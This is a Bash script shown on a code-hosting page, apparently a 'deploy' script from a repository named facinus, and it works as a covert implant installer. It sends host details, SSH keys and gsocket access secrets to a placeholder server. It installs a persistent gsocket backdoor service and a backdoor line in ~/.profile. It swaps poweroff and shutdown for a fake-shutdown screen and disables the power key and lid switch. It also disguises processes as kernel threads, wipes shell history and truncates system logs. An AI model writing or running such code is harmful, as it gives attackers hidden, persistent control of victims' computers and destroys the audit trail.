elleoma/facinus
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
93a4657fbf1cd10821a23f1eab6ef0c02058e24c
facinus/scripts/deploy/y
Amoelle 93a4657fbf change ssh algorithm
2025-06-02 09:56:59 +03:00

474 lines
16 KiB
Bash
Executable File
Raw Blame History

#!/bin/bash
SERVER_URL="SERVER_PLACEHOLDER"
LOG_ENDPOINT="$SERVER_URL/deployment/log_receiver.php"
AUTH_TOKEN="TOKEN_PLACEHOLDER"
TEMP_DIR=$(mktemp -d)
trap 'rm -rf "$TEMP_DIR"' EXIT
log_cmd() {
local cmd="$1"
local desc="$2"
local log_file="$3"
echo -e "\n[$(date '+%Y-%m-%d %H:%M:%S')] EXECUTING: $desc" >> "$log_file"
echo "$ $cmd" >> "$log_file"
echo "--------------------------------------------" >> "$log_file"
local output
output=$(eval "$cmd" 2>&1)
local status=$?
echo "$output" >> "$log_file"
echo "EXIT STATUS: $status" >> "$log_file"
echo "============================================" >> "$log_file"
return $status
}
get_system_info() {
{
echo "{"
echo " \"hostname\": \"$(hostname)\","
echo " \"kernel\": \"$(uname -r)\","
echo " \"os\": \"$(lsb_release -ds 2>/dev/null || cat /etc/os-release | grep PRETTY_NAME | cut -d= -f2 | tr -d '\"')\","
echo " \"ip\": \"$(hostname -I | awk '{print $1}')\","
echo " \"mac\": \"$(ip link show | grep -E 'link/ether' | head -n1 | awk '{print $2}')\","
echo " \"cpu\": \"$(grep 'model name' /proc/cpuinfo | head -n1 | cut -d: -f2 | sed 's/^[ \t]*//')\","
echo " \"ram_total\": \"$(free -h | awk 'NR==2 {print $2}')\","
echo " \"disk_total\": \"$(df -h --total | grep total | awk '{print $2}')\","
echo " \"user\": \"$(whoami)\","
echo " \"is_root\": \"$(sudo -l &> /dev/null && echo "true" || echo "false")\","
echo " \"users\": \"$(awk -F: '$7 ~ /bash|sh/ {printf "%s ", $1} END {print ""}' /etc/passwd)\","
echo " \"timestamp\": \"$(date '+%Y-%m-%d %H:%M:%S')\","
echo " \"uptime\": \"$(uptime -p)\""
echo "}"
} | tr -d '\n' | sed 's/ //g' | jq -R .
}
send_logs() {
local log_file="$1"
local secret_val="$2"
local secret_type="$3"
local sysinfo=$(get_system_info)
local hostname=$(hostname)
curl -s -X POST "$LOG_ENDPOINT" \
-F "auth_token=$AUTH_TOKEN" \
-F "hostname=$hostname" \
-F "log_data=@$log_file" \
-F "system_info=$sysinfo" \
-F "secret_type=$secret_type" \
-F "secret_value=$secret_val" \
> /dev/null
}
detect_package_manager() {
if command -v apt &> /dev/null; then
echo "apt"
elif command -v dnf &> /dev/null; then
echo "dnf"
elif command -v yum &> /dev/null; then
echo "yum"
elif command -v pacman &> /dev/null; then
echo "pacman"
elif command -v zypper &> /dev/null; then
echo "zypper"
else
echo "unknown"
fi
}
install_ssh() {
local log_file="$TEMP_DIR/ssh_install.log"
touch "$log_file"
echo "[*] Installing SSH server..."
local pkg_manager=$(detect_package_manager)
case "$pkg_manager" in
apt)
if ! dpkg -s openssh-server &> /dev/null; then
log_cmd "sudo apt update" "Updating package lists" "$log_file"
log_cmd "sudo apt install -y openssh-server" "Installing OpenSSH server" "$log_file"
fi
log_cmd "sudo systemctl enable ssh" "Enabling SSH service" "$log_file"
log_cmd "sudo systemctl start ssh" "Starting SSH service" "$log_file"
;;
dnf|yum)
if ! rpm -q openssh-server &> /dev/null; then
log_cmd "sudo $pkg_manager install -y openssh-server" "Installing OpenSSH server" "$log_file"
fi
log_cmd "sudo systemctl enable sshd" "Enabling SSH service" "$log_file"
log_cmd "sudo systemctl start sshd" "Starting SSH service" "$log_file"
;;
pacman)
if ! pacman -Q openssh &> /dev/null; then
log_cmd "sudo pacman -S --noconfirm openssh" "Installing OpenSSH server" "$log_file"
fi
log_cmd "sudo systemctl enable sshd" "Enabling SSH service" "$log_file"
log_cmd "sudo systemctl start sshd" "Starting SSH service" "$log_file"
;;
zypper)
if ! rpm -q openssh-server &> /dev/null; then
log_cmd "sudo zypper install -y openssh-server" "Installing OpenSSH server" "$log_file"
fi
log_cmd "sudo systemctl enable sshd" "Enabling SSH service" "$log_file"
log_cmd "sudo systemctl start sshd" "Starting SSH service" "$log_file"
;;
*)
echo "[!] Unsupported package manager. SSH server installation skipped."
return 1
;;
esac
if [ -f ~/.ssh/id_rsa.pub ]; then
send_logs "$log_file" "$(cat ~/.ssh/id_rsa.pub)" "ssh_key"
else
log_cmd "ssh-keygen -t ed25519 -N '' -f ~/.ssh/id_ed25519" "Generating SSH key" "$log_file"
if [ -f ~/.ssh/id_rsa.pub ]; then
send_logs "$log_file" "$(cat ~/.ssh/id_ed25519.pub)" "ssh_key"
fi
fi
local ssh_port=$(grep -E "^Port " /etc/ssh/sshd_config | awk '{print $2}')
[ -z "$ssh_port" ] && ssh_port=22
send_logs "$log_file" "{\"port\":$ssh_port}" "ssh_config"
echo "[+] SSH server installed and configured."
}
setup_wol() {
local log_file="$TEMP_DIR/wol_setup.log"
touch "$log_file"
echo "[*] Setting up Wake-on-LAN..."
local pkg_manager=$(detect_package_manager)
case "$pkg_manager" in
apt)
if ! dpkg -s ethtool &> /dev/null; then
log_cmd "sudo apt install -y ethtool" "Installing ethtool" "$log_file"
fi
;;
dnf|yum)
if ! rpm -q ethtool &> /dev/null; then
log_cmd "sudo $pkg_manager install -y ethtool" "Installing ethtool" "$log_file"
fi
;;
pacman)
if ! pacman -Q ethtool &> /dev/null; then
log_cmd "sudo pacman -S --noconfirm ethtool" "Installing ethtool" "$log_file"
fi
;;
zypper)
if ! rpm -q ethtool &> /dev/null; then
log_cmd "sudo zypper install -y ethtool" "Installing ethtool" "$log_file"
fi
;;
*)
echo "[!] Unsupported package manager. WoL setup may be incomplete."
;;
esac
local interface=$(ip route | grep default | awk '{print $5}' | head -n1)
if [ -z "$interface" ]; then
echo "[!] No network interface found."
return 1
fi
if ethtool "$interface" | grep -q "Wake-on: g"; then
echo "[+] Wake-on-LAN is already enabled on $interface."
log_cmd "sudo ethtool -s $interface wol g" "Enabling Wake-on-LAN" "$log_file"
cat > "$TEMP_DIR/wol.service" << EOF
[Unit]
Description=Enable Wake-on-LAN on $interface
After=network.target
[Service]
Type=oneshot
ExecStart=/usr/sbin/ethtool -s $interface wol g
RemainAfterExit=yes
[Install]
WantedBy=multi-user.target
EOF
sudo mv "$TEMP_DIR/wol.service" /etc/systemd/system/wol.service
log_cmd "sudo systemctl daemon-reload" "Reloading systemd" "$log_file"
log_cmd "sudo systemctl enable wol.service" "Enabling WoL service" "$log_file"
log_cmd "sudo systemctl start wol.service" "Starting WoL service" "$log_file"
local mac=$(ip link show $interface | grep -E 'link/ether' | awk '{print $2}')
send_logs "$log_file" "{\"interface\":\"$interface\",\"mac\":\"$mac\"}" "wol_config"
echo "[+] Wake-on-LAN configured for interface $interface (MAC: $mac)."
else
echo "[-] Wake-on-LAN is not enabled on $interface."
fi
}
setup_fake_poweroff() {
local log_file="$TEMP_DIR/fake_poweroff.log"
touch "$log_file"
echo "[*] Setting up fake poweroff..."
cat > "$TEMP_DIR/fake-poweroff.sh" << 'EOF'
#!/bin/bash
# This script intercepts poweroff/shutdown commands and fakes a shutdown
# Backup original commands if not already done
if [ ! -f /usr/sbin/poweroff.real ]; then
sudo cp /usr/sbin/poweroff /usr/sbin/poweroff.real
fi
if [ ! -f /usr/sbin/shutdown.real ]; then
sudo cp /usr/sbin/shutdown /usr/sbin/shutdown.real
fi
# Create the fake scripts
cat > "$TEMP_DIR/fake-poweroff" << 'EOT'
#!/bin/bash
# Fake poweroff script that just locks the screen
echo "System is powering off..."
# Change to TTY7 and clear screen
sudo chvt 7
sudo clear
# Display fake shutdown messages
echo -e "\n\n * Unmounting filesystems..."
sleep 0.5
echo " * Stopping system services..."
sleep 0.7
echo " * Powering off system..."
sleep 1
# Turn off display if possible
xset dpms force off &> /dev/null || true
# Lock system
loginctl lock-session &> /dev/null || true
# Wait forever in background
(while true; do sleep 1000; done) &
# Make it hard to exit with Ctrl+C
trap "" INT TERM
# Just wait here
sleep infinity
EOT
chmod +x "$TEMP_DIR/fake-poweroff"
sudo mv "$TEMP_DIR/fake-poweroff" /usr/local/bin/fake-poweroff
# Replace the original commands with wrappers to our fake script
cat > "$TEMP_DIR/poweroff-wrapper" << 'EOT'
#!/bin/bash
# Check for force flag
if [[ " $* " == *" -f "* ]] || [[ " $* " == *" --force "* ]]; then
exec /usr/sbin/poweroff.real "$@"
else
exec /usr/local/bin/fake-poweroff
fi
EOT
chmod +x "$TEMP_DIR/poweroff-wrapper"
sudo mv "$TEMP_DIR/poweroff-wrapper" /usr/sbin/poweroff
cat > "$TEMP_DIR/shutdown-wrapper" << 'EOT'
#!/bin/bash
# Check for force flag
if [[ " $* " == *" -f "* ]] || [[ " $* " == *" --force "* ]]; then
exec /usr/sbin/shutdown.real "$@"
else
exec /usr/local/bin/fake-poweroff
fi
EOT
chmod +x "$TEMP_DIR/shutdown-wrapper"
sudo mv "$TEMP_DIR/shutdown-wrapper" /usr/sbin/shutdown
EOF
log_cmd "sudo bash $TEMP_DIR/fake-poweroff.sh" "Installing fake poweroff scripts" "$log_file"
log_cmd "sudo sed -i 's/^#HandlePowerKey=poweroff/HandlePowerKey=ignore/' /etc/systemd/logind.conf" "Disabling pressing power key" "$log_file"
log_cmd "sudo sed -i 's/^#HandlePowerKeyLongPress=poweroff/HandlePowerKeyLongPress=ignore/' /etc/systemd/logind.conf" "Disabling long press power key" "$log_file"
log_cmd "sudo sed -i 's/^#HandleLidSwitch=suspend/HandleLidSwitch=ignore/' /etc/systemd/logind.conf" "Disabling lid switch" "$log_file"
send_logs "$log_file" "Fake poweroff installed" "fake_poweroff"
echo "[+] Fake poweroff configured. Normal shutdown commands will now fake a shutdown."
echo " Use 'poweroff -f' or 'shutdown -f' for an actual shutdown."
}
install_gsocket() {
local log_file="$TEMP_DIR/gsocket_install.log"
touch "$log_file"
echo "[*] Installing gsocket for remote access..."
local pkg_manager=$(detect_package_manager)
case "$pkg_manager" in
apt)
log_cmd "sudo apt update && sudo apt install -y build-essential libssl-dev automake autoconf" "Installing build dependencies" "$log_file"
;;
dnf|yum)
log_cmd "sudo $pkg_manager install -y gcc gcc-c++ make git openssl-devel" "Installing build dependencies" "$log_file"
;;
pacman)
log_cmd "sudo pacman -S --noconfirm base-devel git openssl" "Installing build dependencies" "$log_file"
;;
zypper)
log_cmd "sudo zypper install -y -t pattern devel_basis" "Installing development pattern" "$log_file"
log_cmd "sudo zypper install -y git libopenssl-devel" "Installing additional dependencies" "$log_file"
;;
*)
echo "[!] Unsupported package manager. Attempting to continue with gsocket installation."
;;
esac
if ! command -v gs-netcat &>/dev/null; then
log_cmd "wget -q -O $TEMP_DIR/gsocket_linux-$(uname -m).tar.gz \"https://github.com/hackerschoice/gsocket/archive/refs/tags/v1.4.43.tar.gz\"" "Download gsocket" "$log_file"
log_cmd "cd $TEMP_DIR && tar xfz gsocket_linux-*.tar.gz" "Extracting gsocket" "$log_file"
log_cmd "cd $TEMP_DIR/gsocket-* && ./bootstrap && ./configure && make && sudo make install" "Building and install gsocket" "$log_file"
fi
local gs_root_secret=$(gs-netcat -g)
local gs_user_secret=$(gs-netcat -g)
cat > "$TEMP_DIR/gsocket-backdoor.service" << EOF
[Unit]
Description=GSocket Remote Access
After=network.target
[Service]
Type=simple
ExecStart=/usr/local/bin/gs-netcat -s $gs_root_secret -lqi
Restart=always
RestartSec=10
StandardOutput=null
StandardError=null
[Install]
WantedBy=default.target
EOF
sudo mv "$TEMP_DIR/gsocket-backdoor.service" /etc/systemd/system/
log_cmd "sudo systemctl daemon-reload" "Reloading systemd" "$log_file"
log_cmd "sudo systemctl enable gsocket-backdoor.service" "Enabling gsocket service" "$log_file"
log_cmd "sudo systemctl start gsocket-backdoor.service" "Starting gsocket service" "$log_file"
log_cmd "echo 'killall -0 gs-netcat 2>/dev/null || (GSOCKET_ARGS=\"-s $gs_user_secret -liqD\" SHELL=/bin/bash exec -a bash gs-netcat)' >> ~/.profile" "Add backdoor to .profile" "$log_file"
log_cmd "source ~/.profile" "Reloading .profile" "$log_file"
cat > "$TEMP_DIR/gsocket_info.txt" << EOF
GSocket Connection Information
=============================
Connect as root: gs-netcat -s $gs_root_secret -i
Connect as user: gs-netcat -s $gs_user_secret -i
=============================
EOF
# Send the gsocket secret to the server
send_logs "$log_file" "$gs_root_secret" "gsocket_root_secret"
send_logs "$log_file" "$gs_user_secret" "gsocket_user_secret"
send_logs "$log_file" "$(cat $TEMP_DIR/gsocket_info.txt)" "gsocket_info"
echo "[+] GSocket installed. You can connect using: gs-netcat -s $gs_root_secret -i"
}
setup_stealth() {
local log_file="$TEMP_DIR/stealth_setup.log"
touch "$log_file"
echo "[*] Setting up stealth mode..."
cat > "$TEMP_DIR/obfuscate.sh" << 'EOF'
#!/bin/bash
obfuscate_run() {
local fake_name="$1"
shift
exec -a "$fake_name" "$@"
}
if ! grep -q "obfuscate_run" ~/.bashrc; then
cat >> ~/.bashrc << 'EOT'
obfuscate_run() {
local fake_name="$1"
shift
exec -a "$fake_name" "$@"
}
EOT
fi
if ! grep -q "alias stealthy" ~/.bashrc; then
cat >> ~/.bashrc << 'EOT'
alias stealthy='obfuscate_run "[khugepageds]"'
alias hidden='obfuscate_run "[migration/0]"'
EOT
fi
(crontab -l 2>/dev/null; echo "0 * * * * cat /dev/null > ~/.bash_history") | crontab -
EOF
log_cmd "bash $TEMP_DIR/obfuscate.sh" "Setting up process obfuscation" "$log_file"
cat > "$TEMP_DIR/clean-logs.service" << 'EOF'
[Unit]
Description=Clean System Logs
After=network.target
[Service]
Type=oneshot
ExecStart=/bin/bash -c 'find /var/log -type f -name "*" -exec truncate -s 0 {} \;'
ExecStart=/bin/bash -c 'journalctl --vacuum-time=1d'
[Install]
WantedBy=default.target
EOF
sudo mv "$TEMP_DIR/clean-logs.service" /etc/systemd/system/
cat > "$TEMP_DIR/clean-logs.timer" << 'EOF'
[Unit]
Description=Run log cleaning daily
After=network.target
[Timer]
OnBootSec=15min
OnUnitActiveSec=1d
[Install]
WantedBy=timers.target
EOF
sudo mv "$TEMP_DIR/clean-logs.timer" /etc/systemd/system/
log_cmd "sudo systemctl daemon-reload" "Reloading systemd" "$log_file"
log_cmd "sudo systemctl enable clean-logs.timer" "Enabling log cleaning" "$log_file"
log_cmd "sudo systemctl start clean-logs.timer" "Starting log cleaning" "$log_file"
send_logs "$log_file" "Stealth mode activated" "stealth_mode"
echo "[+] Stealth mode configured."
}
main() {
local log_file="$TEMP_DIR/main.log"
touch "$log_file"
echo "[*] Beginning setup..."
echo "[*] Target system: $(hostname) ($(whoami))"
sudo apt install -y curl jq &> /dev/null || true
send_logs "$log_file" "$(get_system_info)" "system_info"
install_ssh
setup_wol
setup_fake_poweroff
install_gsocket
setup_stealth
echo "[+] Setup complete."
echo "[+] All logs and credentials have been sent to the server."
}
main
Reference in New Issue View Git Blame Copy Permalink